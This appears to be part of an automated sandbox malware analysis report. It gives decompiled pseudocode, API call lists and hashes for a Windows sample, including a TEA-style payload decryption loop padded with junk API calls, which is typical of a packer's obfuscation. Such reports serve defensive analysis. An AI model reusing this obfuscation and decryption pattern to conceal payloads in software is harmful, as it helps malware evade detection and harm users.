                                                                                                                                    • MapViewOfFileEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404986
                                                                                                                                    • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00404995
                                                                                                                                    • DebugBreak.KERNEL32 ref: 0040499B
                                                                                                                                    • LocalSize.KERNEL32 ref: 004049A2
                                                                                                                                    • VerifyVersionInfoA.KERNEL32(?,00000000,00000000,00000000), ref: 004049B2
                                                                                                                                    Strings
                                                                                                                                    • vucumayidomeyutebapinovazagoholedojugitonigeku, xrefs: 00404967
                                                                                                                                    • Jefub, xrefs: 0040495C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileName$AtomBreakComputerDebugDeleteDirectoryFindGlobalInfoLocalReadResourceSizeVerifyVersionViewWindowslstrlen
                                                                                                                                    • String ID: Jefub$vucumayidomeyutebapinovazagoholedojugitonigeku
                                                                                                                                    • API String ID: 1598760986-1944011931
                                                                                                                                    • Opcode ID: adefe500efbc14d28bb72513f74e9c56b115339100aea53116b3cdb8effbfeba
                                                                                                                                    • Instruction ID: 391ae0607dfdaf996c1953775084dbbcf6caeb71ff98b01dc6672098877be60a
                                                                                                                                    • Opcode Fuzzy Hash: adefe500efbc14d28bb72513f74e9c56b115339100aea53116b3cdb8effbfeba
                                                                                                                                    • Instruction Fuzzy Hash: 080109764021A4ABC3216BA1AE4CDEF3FACEF0A351B004461F68AE1571C7384685CBF9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                    			E004046E7(unsigned int* _a4, signed int _a8) {
                                                                                                                                    				unsigned int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				void* _v16;
                                                                                                                                    				unsigned int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				char _v32;
                                                                                                                                    				intOrPtr _v36;
                                                                                                                                    				intOrPtr _v40;
                                                                                                                                    				intOrPtr _v44;
                                                                                                                                    				intOrPtr _v48;
                                                                                                                                    				intOrPtr _v52;
                                                                                                                                    				long _v56;
                                                                                                                                    				long _v60;
                                                                                                                                    				long _v64;
                                                                                                                                    				long _v68;
                                                                                                                                    				long _v72;
                                                                                                                                    				long _v76;
                                                                                                                                    				char _v1100;
                                                                                                                                    				void _v2124;
                                                                                                                                    				char _v3148;
                                                                                                                                    				char _v4172;
                                                                                                                                    				short _v6220;
                                                                                                                                    				unsigned int* _t74;
                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                    				signed int _t83;
                                                                                                                                    				signed int _t88;
                                                                                                                                    				unsigned int* _t99;
                                                                                                                                    				unsigned int _t120;
                                                                                                                                    				unsigned int _t121;
                                                                                                                                    				unsigned int _t122;
                                                                                                                                    				intOrPtr _t130;
                                                                                                                                    
                                                                                                                                    				E004093A0(0x1848);
                                                                                                                                    				_t74 = _a4;
                                                                                                                                    				_t122 =  *_t74;
                                                                                                                                    				_v20 = _t74[1];
                                                                                                                                    				_t76 = _a8;
                                                                                                                                    				_v40 =  *_t76;
                                                                                                                                    				_v36 =  *((intOrPtr*)(_t76 + 4));
                                                                                                                                    				_t130 = 0xc6ef3720;
                                                                                                                                    				_v8 = _t122;
                                                                                                                                    				_v28 = 0xc6ef3720;
                                                                                                                                    				_v52 = 0x9e3779b9;
                                                                                                                                    				_v44 =  *((intOrPtr*)(_t76 + 8));
                                                                                                                                    				_v48 =  *((intOrPtr*)(_t76 + 0xc));
                                                                                                                                    				_v32 = 0x20;
                                                                                                                                    				do {
                                                                                                                                    					_a8 = _t122 << 4;
                                                                                                                                    					if( *0x60e9b0 == 5) {
                                                                                                                                    						__imp__GetConsoleAliasExesLengthW();
                                                                                                                                    						_t122 = _v8;
                                                                                                                                    					}
                                                                                                                                    					_a8 = _a8 + _v44;
                                                                                                                                    					_v12 = _t130 + _t122;
                                                                                                                                    					_t120 = _t122 >> 5;
                                                                                                                                    					if( *0x60e9b0 == 0x1b) {
                                                                                                                                    						__imp__FindNextVolumeW(0,  &_v3148, 0);
                                                                                                                                    						SetLocaleInfoA(0, 0, "batapes");
                                                                                                                                    						SetSystemTimeAdjustment(0, 0);
                                                                                                                                    						InterlockedDecrement( &_v76);
                                                                                                                                    						LocalFlags(0);
                                                                                                                                    					}
                                                                                                                                    					_t83 = _a8 ^ _v12;
                                                                                                                                    					_t126 = _v48 + _t120 ^ _t83;
                                                                                                                                    					_a8 = _t83;
                                                                                                                                    					_v24 = _v48 + _t120 ^ _t83;
                                                                                                                                    					 *0x609330 = 0;
                                                                                                                                    					 *0x609330 =  *0x609330 + _v24;
                                                                                                                                    					E00404673( &_v20, _t126);
                                                                                                                                    					if( *0x60e9b0 == 0x839) {
                                                                                                                                    						VerLanguageNameA(0,  &_v1100, 0);
                                                                                                                                    					}
                                                                                                                                    					_t121 = _v20;
                                                                                                                                    					_t88 = _t121 << 4;
                                                                                                                                    					_a8 = _t88;
                                                                                                                                    					if( *0x60e9b0 == 0x78c) {
                                                                                                                                    						GetComputerNameW( &_v6220,  &_v64);
                                                                                                                                    						GetVolumeInformationA(0,  &_v4172, 0,  &_v68,  &_v72,  &_v56,  &_v1100, 0);
                                                                                                                                    						ReadConsoleA(0,  &_v2124, 0,  &_v60, 0);
                                                                                                                                    						_t88 = _a8;
                                                                                                                                    					}
                                                                                                                                    					_a8 = _t88 + _v40;
                                                                                                                                    					_v12 = _v20 + _v28;
                                                                                                                                    					 *0x60933c =  *0x60933c | 0xffffffff;
                                                                                                                                    					 *0x609338 = 0xff6b3619;
                                                                                                                                    					_v24 = (_t121 >> 5) + _v36;
                                                                                                                                    					_a8 = _a8 ^ _v12;
                                                                                                                                    					_a8 = _a8 ^ _v24;
                                                                                                                                    					_v8 = _v8 - _a8;
                                                                                                                                    					_v16 = 0;
                                                                                                                                    					_v16 = _v16 + _v52;
                                                                                                                                    					_t130 = _t130 - _v16;
                                                                                                                                    					_t66 =  &_v32;
                                                                                                                                    					 *_t66 = _v32 - 1;
                                                                                                                                    					_t122 = _v8;
                                                                                                                                    					_v28 = _t130;
                                                                                                                                    				} while ( *_t66 != 0);
                                                                                                                                    				_t99 = _a4;
                                                                                                                                    				_t99[1] = _t121;
                                                                                                                                    				 *_t99 = _t122;
                                                                                                                                    				return _t99;
                                                                                                                                    			}



































                                                                                                                                    0x004046ef
                                                                                                                                    0x004046f4
                                                                                                                                    0x004046f7
                                                                                                                                    0x004046fc
                                                                                                                                    0x004046ff
                                                                                                                                    0x00404705
                                                                                                                                    0x0040470c
                                                                                                                                    0x00404716
                                                                                                                                    0x0040471b
                                                                                                                                    0x0040471e
                                                                                                                                    0x00404721
                                                                                                                                    0x00404728
                                                                                                                                    0x0040472b
                                                                                                                                    0x0040472e
                                                                                                                                    0x00404737
                                                                                                                                    0x00404743
                                                                                                                                    0x00404746
                                                                                                                                    0x00404748
                                                                                                                                    0x0040474e
                                                                                                                                    0x0040474e
                                                                                                                                    0x00404754
                                                                                                                                    0x00404764
                                                                                                                                    0x00404767
                                                                                                                                    0x00404769
                                                                                                                                    0x00404774
                                                                                                                                    0x00404781
                                                                                                                                    0x00404789
                                                                                                                                    0x00404793
                                                                                                                                    0x0040479a
                                                                                                                                    0x0040479a
                                                                                                                                    0x004047a3
                                                                                                                                    0x004047ab
                                                                                                                                    0x004047ad
                                                                                                                                    0x004047b0
                                                                                                                                    0x004047b3
                                                                                                                                    0x004047bc
                                                                                                                                    0x004047c7
                                                                                                                                    0x004047d6
                                                                                                                                    0x004047e1
                                                                                                                                    0x004047e1
                                                                                                                                    0x004047e6
                                                                                                                                    0x004047eb
                                                                                                                                    0x004047f8
                                                                                                                                    0x004047fb
                                                                                                                                    0x00404808
                                                                                                                                    0x0040482b
                                                                                                                                    0x0040483f
                                                                                                                                    0x00404845
                                                                                                                                    0x00404845
                                                                                                                                    0x0040484b
                                                                                                                                    0x00404854
                                                                                                                                    0x00404857
                                                                                                                                    0x00404866
                                                                                                                                    0x00404870
                                                                                                                                    0x00404876
                                                                                                                                    0x0040487c
                                                                                                                                    0x00404882
                                                                                                                                    0x00404885
                                                                                                                                    0x0040488b
                                                                                                                                    0x0040488e
                                                                                                                                    0x00404891
                                                                                                                                    0x00404891
                                                                                                                                    0x00404894
                                                                                                                                    0x00404897
                                                                                                                                    0x00404897
                                                                                                                                    0x004048a0
                                                                                                                                    0x004048a5
                                                                                                                                    0x004048a8
                                                                                                                                    0x004048ac

                                                                                                                                    APIs
                                                                                                                                    • GetConsoleAliasExesLengthW.KERNEL32 ref: 00404748
                                                                                                                                    • FindNextVolumeW.KERNEL32(00000000,?,00000000), ref: 00404774
                                                                                                                                    • SetLocaleInfoA.KERNEL32(00000000,00000000,batapes), ref: 00404781
                                                                                                                                    • SetSystemTimeAdjustment.KERNEL32 ref: 00404789
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00404793
                                                                                                                                    • LocalFlags.KERNEL32 ref: 0040479A
                                                                                                                                    • VerLanguageNameA.KERNEL32(00000000,?,00000000), ref: 004047E1
                                                                                                                                    • GetComputerNameW.KERNEL32 ref: 00404808
                                                                                                                                    • GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 0040482B
                                                                                                                                    • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040483F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ConsoleNameVolume$AdjustmentAliasComputerDecrementExesFindFlagsInfoInformationInterlockedLanguageLengthLocalLocaleNextReadSystemTime
                                                                                                                                    • String ID: $batapes
                                                                                                                                    • API String ID: 141964839-3438967503
                                                                                                                                    • Opcode ID: 2374c1627dceb317a29a929b7c415c522f01d109825ef56173678262f5d56077
                                                                                                                                    • Instruction ID: ca869493045ddb620d15fe0ed55e01d38ce983e1ace99c275affba2566c24b8b
                                                                                                                                    • Opcode Fuzzy Hash: 2374c1627dceb317a29a929b7c415c522f01d109825ef56173678262f5d56077
                                                                                                                                    • Instruction Fuzzy Hash: 0351D4B5900218EFCB04CFA9D9849DEBBF8FF49314F00816AE919E7250D734AA45CFA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E0040D95C(intOrPtr __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                    				struct HINSTANCE__* _t23;
                                                                                                                                    				intOrPtr _t28;
                                                                                                                                    				intOrPtr _t32;
                                                                                                                                    				intOrPtr _t45;
                                                                                                                                    				void* _t46;
                                                                                                                                    
                                                                                                                                    				_t35 = __ebx;
                                                                                                                                    				_push(0xc);
                                                                                                                                    				_push(0x41f078);
                                                                                                                                    				E0040EAC8(__ebx, __edi, __esi);
                                                                                                                                    				_t44 = L"KERNEL32.DLL";
                                                                                                                                    				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                    					_t23 = E0040FCAF(_t44);
                                                                                                                                    				}
                                                                                                                                    				 *(_t46 - 0x1c) = _t23;
                                                                                                                                    				_t45 =  *((intOrPtr*)(_t46 + 8));
                                                                                                                                    				 *((intOrPtr*)(_t45 + 0x5c)) = 0x402748;
                                                                                                                                    				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                                                                                                                                    				if(_t23 != 0) {
                                                                                                                                    					_t35 = __imp__GetProcAddress; // 0x76684ee0
                                                                                                                                    					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                                                                                                                                    					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                                                                                                                                    				}
                                                                                                                                    				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                                                                                                                                    				 *((char*)(_t45 + 0xc8)) = 0x43;
                                                                                                                                    				 *((char*)(_t45 + 0x14b)) = 0x43;
                                                                                                                                    				 *(_t45 + 0x68) = 0x4b42b0;
                                                                                                                                    				E0040DFCF(_t35, 1, 0xd);
                                                                                                                                    				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                                                                                                                    				InterlockedIncrement( *(_t45 + 0x68));
                                                                                                                                    				 *(_t46 - 4) = 0xfffffffe;
                                                                                                                                    				E0040DA31();
                                                                                                                                    				E0040DFCF(_t35, 1, 0xc);
                                                                                                                                    				 *(_t46 - 4) = 1;
                                                                                                                                    				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                                                                                                                                    				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                    					_t32 =  *0x4b3ee0; // 0x4b3e08
                                                                                                                                    					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                                                                                                                                    				}
                                                                                                                                    				E0040B510( *((intOrPtr*)(_t45 + 0x6c)));
                                                                                                                                    				 *(_t46 - 4) = 0xfffffffe;
                                                                                                                                    				return E0040EB0D(E0040DA3A());
                                                                                                                                    			}








                                                                                                                                    0x0040d95c
                                                                                                                                    0x0040d95c
                                                                                                                                    0x0040d95e
                                                                                                                                    0x0040d963
                                                                                                                                    0x0040d968
                                                                                                                                    0x0040d96e
                                                                                                                                    0x0040d976
                                                                                                                                    0x0040d979
                                                                                                                                    0x0040d97e
                                                                                                                                    0x0040d97f
                                                                                                                                    0x0040d982
                                                                                                                                    0x0040d985
                                                                                                                                    0x0040d98f
                                                                                                                                    0x0040d994
                                                                                                                                    0x0040d99c
                                                                                                                                    0x0040d9a4
                                                                                                                                    0x0040d9b4
                                                                                                                                    0x0040d9b4
                                                                                                                                    0x0040d9ba
                                                                                                                                    0x0040d9bd
                                                                                                                                    0x0040d9c4
                                                                                                                                    0x0040d9cb
                                                                                                                                    0x0040d9d4
                                                                                                                                    0x0040d9da
                                                                                                                                    0x0040d9e1
                                                                                                                                    0x0040d9e7
                                                                                                                                    0x0040d9ee
                                                                                                                                    0x0040d9f5
                                                                                                                                    0x0040d9fb
                                                                                                                                    0x0040d9fe
                                                                                                                                    0x0040da01
                                                                                                                                    0x0040da06
                                                                                                                                    0x0040da08
                                                                                                                                    0x0040da0d
                                                                                                                                    0x0040da0d
                                                                                                                                    0x0040da13
                                                                                                                                    0x0040da19
                                                                                                                                    0x0040da2a

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041F078,0000000C,0040DA97,00000000,00000000,?,00409109,00000001,?,?,?,?,?,004042DF,?), ref: 0040D96E
                                                                                                                                    • __crt_waiting_on_module_handle.LIBCMT ref: 0040D979
                                                                                                                                      • Part of subcall function 0040FCAF: Sleep.KERNEL32(000003E8,?,?,0040D8BF,KERNEL32.DLL,?,0040DE0B,?,0040D37B,?,00000001,?,00409109,00000001,?), ref: 0040FCBB
                                                                                                                                      • Part of subcall function 0040FCAF: GetModuleHandleW.KERNEL32(?,?,0040D8BF,KERNEL32.DLL,?,0040DE0B,?,0040D37B,?,00000001,?,00409109,00000001,?,?,?), ref: 0040FCC4
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040D9A2
                                                                                                                                    • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040D9B2
                                                                                                                                    • __lock.LIBCMT ref: 0040D9D4
                                                                                                                                    • InterlockedIncrement.KERNEL32(004B42B0), ref: 0040D9E1
                                                                                                                                    • __lock.LIBCMT ref: 0040D9F5
                                                                                                                                    • ___addlocaleref.LIBCMT ref: 0040DA13
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL$NhvPhv
                                                                                                                                    • API String ID: 1028249917-688579292
                                                                                                                                    • Opcode ID: 596d93066a19b182b1a4c93de4562aa828f4f52809f38b68c36eb0deca75845e
                                                                                                                                    • Instruction ID: ba6171ba78315d231258e0e2ea4cbe3211113b9b54c3ed2960e3a3cc085cff3a
                                                                                                                                    • Opcode Fuzzy Hash: 596d93066a19b182b1a4c93de4562aa828f4f52809f38b68c36eb0deca75845e
                                                                                                                                    • Instruction Fuzzy Hash: 8A118E71944B019AD7209F769905B4ABBE0AF44318F10893FE499B32E1C7B8AA44CF5C
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E004071CA(void* __eflags) {
                                                                                                                                    				intOrPtr _t40;
                                                                                                                                    				intOrPtr _t43;
                                                                                                                                    				void* _t45;
                                                                                                                                    
                                                                                                                                    				E004097B4(E0041C2A0, _t45);
                                                                                                                                    				E0040890D(_t45 - 0x14, 0);
                                                                                                                                    				_t43 =  *0x60e9b8; // 0x0
                                                                                                                                    				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
                                                                                                                                    				 *((intOrPtr*)(_t45 - 0x10)) = _t43;
                                                                                                                                    				_t40 = E004044C7( *((intOrPtr*)(_t45 + 8)), E004043C0(0x60ea44));
                                                                                                                                    				if(_t40 == 0) {
                                                                                                                                    					if(_t43 == 0) {
                                                                                                                                    						_push( *((intOrPtr*)(_t45 + 8)));
                                                                                                                                    						_push(_t45 - 0x10);
                                                                                                                                    						if(E00406FC6() == 0xffffffff) {
                                                                                                                                    							E004091D1(_t45 - 0x20, "bad cast");
                                                                                                                                    							E00409853(_t45 - 0x20, 0x41e878);
                                                                                                                                    						}
                                                                                                                                    						_t40 =  *((intOrPtr*)(_t45 - 0x10));
                                                                                                                                    						 *0x60e9b8 = _t40;
                                                                                                                                    						E004043F5(_t40);
                                                                                                                                    						E00404458();
                                                                                                                                    					} else {
                                                                                                                                    						_t40 = _t43;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
                                                                                                                                    				E00408935(_t45 - 0x14);
                                                                                                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
                                                                                                                                    				return _t40;
                                                                                                                                    			}






                                                                                                                                    0x004071cf
                                                                                                                                    0x004071de
                                                                                                                                    0x004071e3
                                                                                                                                    0x004071e9
                                                                                                                                    0x004071f2
                                                                                                                                    0x00407203
                                                                                                                                    0x00407207
                                                                                                                                    0x0040720b
                                                                                                                                    0x00407211
                                                                                                                                    0x00407217
                                                                                                                                    0x00407222
                                                                                                                                    0x0040722c
                                                                                                                                    0x0040723a
                                                                                                                                    0x0040723a
                                                                                                                                    0x0040723f
                                                                                                                                    0x00407244
                                                                                                                                    0x0040724a
                                                                                                                                    0x00407251
                                                                                                                                    0x0040720d
                                                                                                                                    0x0040720d
                                                                                                                                    0x0040720d
                                                                                                                                    0x0040720b
                                                                                                                                    0x00407256
                                                                                                                                    0x0040725d
                                                                                                                                    0x00407269
                                                                                                                                    0x00407271

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 004071CF
                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004071DE
                                                                                                                                    • int.LIBCPMT ref: 004071F5
                                                                                                                                      • Part of subcall function 004043C0: std::_Lockit::_Lockit.LIBCPMT ref: 004043D1
                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0040722C
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040723A
                                                                                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 0040724A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LockitLockit::_std::_$Exception@8H_prologIncrefThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                    • String ID: D`$bad cast
                                                                                                                                    • API String ID: 2140829718-1116728746
                                                                                                                                    • Opcode ID: 236e60a61687dfc7964ffbd6f0223dc84ab8a7114470c0684a97edf1107e2b45
                                                                                                                                    • Instruction ID: d21c3e808b17cade095eb149b37219d69bb211efcb81495a5a138c27d1c0abf9
                                                                                                                                    • Opcode Fuzzy Hash: 236e60a61687dfc7964ffbd6f0223dc84ab8a7114470c0684a97edf1107e2b45
                                                                                                                                    • Instruction Fuzzy Hash: F5119E72E041159BCB04FBA18942AAE7735AB84724F14063FE521772D2CF3899058799
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                    			E004073CC(void* __ecx, void* __edi) {
                                                                                                                                    				signed int _t25;
                                                                                                                                    				void* _t29;
                                                                                                                                    				signed char _t38;
                                                                                                                                    				void* _t43;
                                                                                                                                    				void* _t44;
                                                                                                                                    
                                                                                                                                    				_t43 = __edi;
                                                                                                                                    				E004097B4(E0041C27C, _t44);
                                                                                                                                    				_t25 =  *(_t44 + 8) & 0x00000017;
                                                                                                                                    				 *(__ecx + 8) = _t25;
                                                                                                                                    				_t38 =  *(__ecx + 0xc) & _t25;
                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                    					if( *((intOrPtr*)(_t44 + 0xc)) == 0) {
                                                                                                                                    						L4:
                                                                                                                                    						if((_t38 & 0x00000004) == 0) {
                                                                                                                                    							_push(2);
                                                                                                                                    							_pop(0);
                                                                                                                                    							if((0 & _t38) == 0) {
                                                                                                                                    								E004070B4(_t44 - 0x6c, _t43, "ios_base::eofbit set");
                                                                                                                                    								_t38 = _t44 - 0x94;
                                                                                                                                    								 *((intOrPtr*)(_t44 - 4)) = 0;
                                                                                                                                    								E0040706F(_t38, _t44 - 0x6c);
                                                                                                                                    								_push("h8\xef\xbf								_t29 = _t44 - 0x94;
                                                                                                                                    								L7:
                                                                                                                                    								_push(_t29);
                                                                                                                                    								L3:
                                                                                                                                    								E00409853();
                                                                                                                                    								goto L4;
                                                                                                                                    							}
                                                                                                                                    							E004070B4(_t44 - 0x28, _t43, "ios_base::failbit set");
                                                                                                                                    							 *((intOrPtr*)(_t44 - 4)) = 1;
                                                                                                                                    							L6:
                                                                                                                                    							_t38 = _t44 - 0x50;
                                                                                                                                    							E0040706F(_t38, _t44 - 0x28);
                                                                                                                                    							_push(0x41e938);
                                                                                                                                    							_t29 = _t44 - 0x50;
                                                                                                                                    							goto L7;
                                                                                                                                    						}
                                                                                                                                    						E004070B4(_t44 - 0x28, _t43, "ios_base::badbit set");
                                                                                                                                    						 *((intOrPtr*)(_t44 - 4)) = 0;
                                                                                                                                    						goto L6;
                                                                                                                                    					}
                                                                                                                                    					_push(0);
                                                                                                                                    					_push(0);
                                                                                                                                    					goto L3;
                                                                                                                                    				}
                                                                                                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
                                                                                                                                    				return _t25;
                                                                                                                                    			}








                                                                                                                                    0x004073cc
                                                                                                                                    0x004073d1
                                                                                                                                    0x004073d9
                                                                                                                                    0x004073dc
                                                                                                                                    0x004073e8
                                                                                                                                    0x004073ea
                                                                                                                                    0x004073f5
                                                                                                                                    0x004073fe
                                                                                                                                    0x00407401
                                                                                                                                    0x0040742a
                                                                                                                                    0x0040742c
                                                                                                                                    0x0040742f
                                                                                                                                    0x0040744f
                                                                                                                                    0x00407458
                                                                                                                                    0x0040745e
                                                                                                                                    0x00407461
                                                                                                                                    0x00407466
                                                                                                                                    0x0040746b
                                                                                                                                    0x00407427
                                                                                                                                    0x00407427
                                                                                                                                    0x004073f9
                                                                                                                                    0x004073f9
                                                                                                                                    0x00000000
                                                                                                                                    0x004073f9
                                                                                                                                    0x00407439
                                                                                                                                    0x0040743e
                                                                                                                                    0x00407413
                                                                                                                                    0x00407417
                                                                                                                                    0x0040741a
                                                                                                                                    0x0040741f
                                                                                                                                    0x00407424
                                                                                                                                    0x00000000
                                                                                                                                    0x00407424
                                                                                                                                    0x0040740b
                                                                                                                                    0x00407410
                                                                                                                                    0x00000000
                                                                                                                                    0x00407410
                                                                                                                                    0x004073f7
                                                                                                                                    0x004073f8
                                                                                                                                    0x00000000
                                                                                                                                    0x004073f8
                                                                                                                                    0x00407476
                                                                                                                                    0x0040747e

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 004073D1
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 004073F9
                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0040741A
                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 00407461
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: std::bad_exception::bad_exception$Exception@8H_prologThrow
                                                                                                                                    • String ID: h8A$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                    • API String ID: 965843388-1196383300
